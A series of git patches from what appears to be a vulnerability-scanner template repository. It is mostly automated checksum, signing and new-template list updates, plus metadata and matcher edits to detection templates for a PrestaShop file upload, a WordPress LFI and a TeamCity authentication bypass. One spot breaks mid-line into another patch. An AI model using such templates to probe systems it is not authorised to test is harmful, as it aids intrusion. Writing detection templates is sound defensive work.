a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml index c88c996e72..c526d7f210 100644 --- a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml +++ b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml @@ -10,7 +10,10 @@ info: metadata: framework: prestashop shodan-query: http.component:"prestashop" + verified: true + max-request: 1 tags: intrusive,file-upload,cartabandonmentpro,prestashop + variables: filename: '{{rand_base(7, "abc")}}' title: '{{rand_base(7, "abc")}}' @@ -45,9 +48,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "{{filename}}.php.png" - part: body - - type: dsl - dsl: - - status_code == 200 \ No newline at end of file + + - type: status + status: + - 200 From 5c2fb2c82163a1bc4a62efa3945697de1daf3eb4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 May 2024 22:24:16 +0530 Subject: [PATCH 0499/1768] added metadata --- http/cves/2024/CVE-2024-3136.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index a7558b75f3..41d6536673 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -21,6 +21,10 @@ info: cve-id: CVE-2024-3136 epss-score: 0.00045 epss-percentile: 0.14274 + metadata: + publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" + verified: true + max-request: 2 tags: cve,cve2024,wp,wordpress,unauth,lfi variables: From ffa79ad075aed47d8f6a5f86d7593e393f3cdad1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 2 May 2024 16:57:13 +0000 Subject: [PATCH 0500/1768] Auto Generated New Template Addition List [Thu May 2 16:57:13 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a939cb9fdb..25bab03a0a 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-24131.yaml http/cves/2024/CVE-2024-27956.yaml +http/cves/2024/CVE-2024-3136.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-31849.yaml http/cves/2024/CVE-2024-32399.yaml From 9d85cec80edd98b752a92ecd4fbb725d2152217b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 16:57:19 +0000 Subject: [PATCH 0501/1768] Auto Generated Templates Checksum [Thu May 2 16:57:19 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9c1a3c9dae..33a3678ed5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:376a4fb16e0e5560501f236500da20e55cba057a -cves.json-checksum.txt:1481c0b530da1a9cc9964a07c30f33a0dda4b463 +cves.json:a83b1d28d08a4db46d17d388bcf81c7e84e5d070 +cves.json-checksum.txt:ed3a389b3e1ad60c470636fdd258e185cc7b8a9b dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3103,7 +3103,7 @@ http/cves/2023/CVE-2023-3848.yaml:626c7451b8a7417718cdc68024755692bb45b6af http/cves/2023/CVE-2023-3849.yaml:fc829971129fd5dd0e9f5efefcc0f9a8ce81db52 http/cves/2023/CVE-2023-38501.yaml:105e3431e6c0c3cc63a89c92edd808e0e21ea0d8 http/cves/2023/CVE-2023-38646.yaml:64213f51ae213555592207527e163a41e82c66ab -http/cves/2023/CVE-2023-38964.yaml:87e3e1154c48c90c8ac7ba829355bd16cc8c50a8 +http/cves/2023/CVE-2023-38964.yaml:03b48ad92119668fb6e83bb4d65f686be71735de http/cves/2023/CVE-2023-39002.yaml:6b28884d827963d2b420ca0054935711ae4e7ac7 http/cves/2023/CVE-2023-39026.yaml:a51a79a6eb674c4075565e9dbbc5e77ecce8b8d3 http/cves/2023/CVE-2023-39108.yaml:692192b618ece9c517379af9e65f86f9b29bf882 @@ -3148,7 +3148,7 @@ http/cves/2023/CVE-2023-42442.yaml:f9d27d085afe82b96452ceaccf7be30e9a2202f9 http/cves/2023/CVE-2023-42793.yaml:a842d71c8b60488cd3dc70eb328d5b70050216bf http/cves/2023/CVE-2023-43177.yaml:5952017087ab37bcfce0de1edfc977ccdca951f4 http/cves/2023/CVE-2023-43187.yaml:9114ac2207f9c442f7a20843775a6f3d8d47a64f -http/cves/2023/CVE-2023-43208.yaml:2bfcf71b993bf421ef04f99f1669c57bb45d1060 +http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65 http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56 http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6 http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d @@ -3257,6 +3257,7 @@ http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc +http/cves/2024/CVE-2024-3136.yaml:ba8f4a1c993665d4826e19354e13d7816e065a52 http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 @@ -8460,7 +8461,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fe1e149a3a849d0216c038a879470d701855957d +templates-checksum.txt:dd30fdb79b0b543dfdc33b03c8f75b127441944a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 24e63c61caa9fb256c3da3887b296070e1c13114 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 2 May 2024 16:57:54 +0000 Subject: [PATCH 0502/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 249b94f1ec..aa4b3720fd 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -16,6 +16,7 @@ on: - 'http/cves/2024/CVE-2024-1183.yaml' - 'http/cves/2024/CVE-2024-24131.yaml' - 'http/cves/2024/CVE-2024-27956.yaml' + - 'http/cves/2024/CVE-2024-3136.yaml' - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-31849.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' From 8455482d700163dad6057921af260bd0af938801 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 16:59:05 +0000 Subject: [PATCH 0503/1768] Auto Template Signing [Thu May 2 16:59:05 UTC 2024] :robot: --- http/cves/2024/CVE-2024-3136.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index 41d6536673..1239487900 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -60,3 +60,4 @@ http: group: 1 internal: true name: nonce +# digest: 4a0a0047304502206e33a2d814c15125c07d788ddd3fa86d8d8c00963ff4ee67ee6978b537395c2e022100c3dbee7b576104e81ce534ed2e9bcce2296b7a6ffeca66acde35e5d081bb93d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5dffa60ae1d3445b4160af6a83524083e0d04a52 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 2 May 2024 22:36:58 +0530 Subject: [PATCH 0504/1768] Update CVE-2024-23917.yaml --- http/cves/2024/CVE-2024-23917.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 5eb4784e0b..ad01e82114 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -19,11 +19,13 @@ info: cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 vendor: jetbrains product: teamcity tags: cve,cve2024,auth-bypass,teamcity flow: http(1) && http(2) + http: - method: POST path: From a6c2e0f5449a700eb8df618f67a02f86cae26bc0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 2 May 2024 17:31:16 +0000 Subject: [PATCH 0505/1768] Auto Generated New Template Addition List [Thu May 2 17:31:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 25bab03a0a..7e991947a1 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/cves/2024/CVE-2024-3136.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-31849.yaml http/cves/2024/CVE-2024-32399.yaml +http/cves/2024/CVE-2024-4348.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml http/default-logins/crushftp/crushftp-default-login.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml From 209180ec2f35b57c6754fbeb3d25c89048a1caa9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 17:31:33 +0000 Subject: [PATCH 0506/1768] Auto Generated Templates Checksum [Thu May 2 17:31:33 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 33a3678ed5..d0f106671b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3257,12 +3257,13 @@ http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc -http/cves/2024/CVE-2024-3136.yaml:ba8f4a1c993665d4826e19354e13d7816e065a52 +http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730 http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c +http/cves/2024/CVE-2024-4348.yaml:634139be964907a52ab70f8fc0e835d0071559cb http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8461,7 +8462,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dd30fdb79b0b543dfdc33b03c8f75b127441944a +templates-checksum.txt:94269a70d319eec103c3b28f3d6c96ea031771d6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6a6b4c0b734882430ee32dc981e1d63e7badc5fb Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 2 May 2024 17:32:01 +0000 Subject: [PATCH 0507/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index aa4b3720fd..4f180eea01 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -20,6 +20,7 @@ on: - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-31849.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' + - 'http/cves/2024/CVE-2024-4348.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' - 'http/default-logins/crushftp/crushftp-default-login.yaml' - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' From c5b566a69c0c3244fc4f17ca702bb2970b6b53b4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 17:32:46 +0000 Subject: [PATCH 0508/1768] Auto Generated Templates Checksum [Thu May 2 17:32:46 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d0f106671b..cf4daa1e1b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8086,7 +8086,7 @@ http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:7c640995ee7efa79791af94 http/vulnerabilities/wordpress/watu-xss.yaml:7c2e2e4243dc0c7e95c494b365fab550869595f6 http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:20f4513cb63d35b7ad428f8cc0f409efc2c33ee2 http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:57027e142e6204ddd61f5110be2afd3915bcb4dd -http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:4f7ab34ae0704143decef88cb3c65b80f19484f6 +http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:46d0c1cec7b25d5121919c3553d1426aeb570f2c http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml:7c831fd57fcfebd4d567dc1a13f8fa8fafa2b6b2 http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml:5baba890d00daae20eb4e5f2dea36d5e1075b3a9 http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:d0893166dea4943ff086abbb4bdad272a134bbd0 @@ -8462,7 +8462,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:94269a70d319eec103c3b28f3d6c96ea031771d6 +templates-checksum.txt:4251d9a3b65b59998d42d4b08463b35b4d88ed84 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f5bbdae7917caab0f8d3da964684470498cf57a6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 17:33:05 +0000 Subject: [PATCH 0509/1768] Auto Template Signing [Thu May 2 17:33:05 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4348.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index 1ed75b90f1..58c0113dd0 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402204d3f2a0f97eb7ea7fe180e934519026ed231f12223669f51926597f7209ee4a402201edf5e99628b2435af3325bf2f7cac5db876ef8960118f25a1b0cbe87998d6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6a4afe272756dcca52605d5648cada88458c4b53 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 2 May 2024 17:34:51 +0000 Subject: [PATCH 0510/1768] Auto Generated New Template Addition List [Thu May 2 17:34:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7e991947a1..e2a87f35e5 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/cves/2023/CVE-2023-43208.yaml http/cves/2023/CVE-2023-4973.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml +http/cves/2024/CVE-2024-23917.yaml http/cves/2024/CVE-2024-24131.yaml http/cves/2024/CVE-2024-27956.yaml http/cves/2024/CVE-2024-3136.yaml From 311b314759291a7951fb41fd95ef7c3d8d1bdd09 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 2 May 2024 17:35:30 +0000 Subject: [PATCH 0511/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4f180eea01..e7c81c7bdb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/cves/2023/CVE-2023-4973.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' + - 'http/cves/2024/CVE-2024-23917.yaml' - 'http/cves/2024/CVE-2024-24131.yaml' - 'http/cves/2024/CVE-2024-27956.yaml' - 'http/cves/2024/CVE-2024-3136.yaml' From 760e47b2d39cfe12404a4415cf8a19fc19ebee79 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 17:36:39 +0000 Subject: [PATCH 0512/1768] Auto Template Signing [Thu May 2 17:36:38 UTC 2024] :robot: --- http/cves/2024/CVE-2024-23917.yaml | 1 + .../wordpress/wordpress-accessible-wpconfig.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index ad01e82114..1a387b8796 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -69,3 +69,4 @@ http: - "contains(content_type,'application/xml')" - "contains(body,'=5' + - 'duration>=4' - 'status_code == 200' - 'contains(header, "application/json")' - 'contains_all(body, "bulk_action", "_sent", "errortype")' From e83ea5ecec67d247fe748870ab68d3846382ab6a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 2 May 2024 18:31:40 +0000 Subject: [PATCH 0514/1768] Auto Generated New Template Addition List [Thu May 2 18:31:40 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e2a87f35e5..8a3aa3df71 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/cves/2024/CVE-2024-1183.yaml http/cves/2024/CVE-2024-23917.yaml http/cves/2024/CVE-2024-24131.yaml http/cves/2024/CVE-2024-27956.yaml +http/cves/2024/CVE-2024-2876.yaml http/cves/2024/CVE-2024-3136.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-31849.yaml From 0986da22ca5a20884942edc856dd2b3e3a7a9613 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 18:31:44 +0000 Subject: [PATCH 0515/1768] Auto Generated Templates Checksum [Thu May 2 18:31:44 UTC 2024] :robot: --- templates-checksum.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index cf4daa1e1b..0dbe2f6bf1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3241,6 +3241,7 @@ http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 +http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 @@ -3254,6 +3255,7 @@ http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 http/cves/2024/CVE-2024-27956.yaml:6642a8487441523926a0828c54b333ba9737522f http/cves/2024/CVE-2024-28255.yaml:dd2f4a52d0d4f9af3c6a6fc10a917e99e8f0717d http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096 +http/cves/2024/CVE-2024-2876.yaml:a790d7d69f388090aa36e39977fd33c0389df5db http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc @@ -3263,7 +3265,7 @@ http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c -http/cves/2024/CVE-2024-4348.yaml:634139be964907a52ab70f8fc0e835d0071559cb +http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8086,7 +8088,7 @@ http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:7c640995ee7efa79791af94 http/vulnerabilities/wordpress/watu-xss.yaml:7c2e2e4243dc0c7e95c494b365fab550869595f6 http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:20f4513cb63d35b7ad428f8cc0f409efc2c33ee2 http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:57027e142e6204ddd61f5110be2afd3915bcb4dd -http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:46d0c1cec7b25d5121919c3553d1426aeb570f2c +http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:06e5d8c96afa6b5298d67c8c9020693148b77ae0 http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml:7c831fd57fcfebd4d567dc1a13f8fa8fafa2b6b2 http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml:5baba890d00daae20eb4e5f2dea36d5e1075b3a9 http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:d0893166dea4943ff086abbb4bdad272a134bbd0 @@ -8462,7 +8464,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4251d9a3b65b59998d42d4b08463b35b4d88ed84 +templates-checksum.txt:4203d3910bb642076ac29e4385a53d70695a51ef wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 639556d84d8cc7cfcba32acc3ca703fe20c44079 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 May 2024 18:31:46 +0000 Subject: [PATCH 0516/1768] Auto Generated cves.json [Thu May 2 18:31:46 UTC 2024] :robot: --- cves.json | 4 ++++ cves.json-checksum.txt | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index b22156eddc..f010ecf746 100644 --- a/cves.json +++ b/cves.json @@ -2347,6 +2347,7 @@ {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"} {"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-2389","Info":{"Name":"Progress Kemp Flowmon - Command Injection","Severity":"critical","Description":"In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-2389.yaml"} +{"ID":"CVE-2024-23917","Info":{"Name":"JetBrains TeamCity \u003e 2023.11.3 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23917.yaml"} {"ID":"CVE-2024-24131","Info":{"Name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","Severity":"medium","Description":"SuperWebMailer v9.31.0.01799 was discovered to contain a reflected cross-site scripting (XSS) vulenrability via the component api.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-24131.yaml"} {"ID":"CVE-2024-25600","Info":{"Name":"Unauthenticated Remote Code Execution – Bricks \u003c= 1.9.6","Severity":"critical","Description":"Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks \u003c= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-25600.yaml"} {"ID":"CVE-2024-25669","Info":{"Name":"CaseAware a360inc - Cross-Site Scripting","Severity":"medium","Description":"a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017-\u003e\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-25669.yaml"} @@ -2360,14 +2361,17 @@ 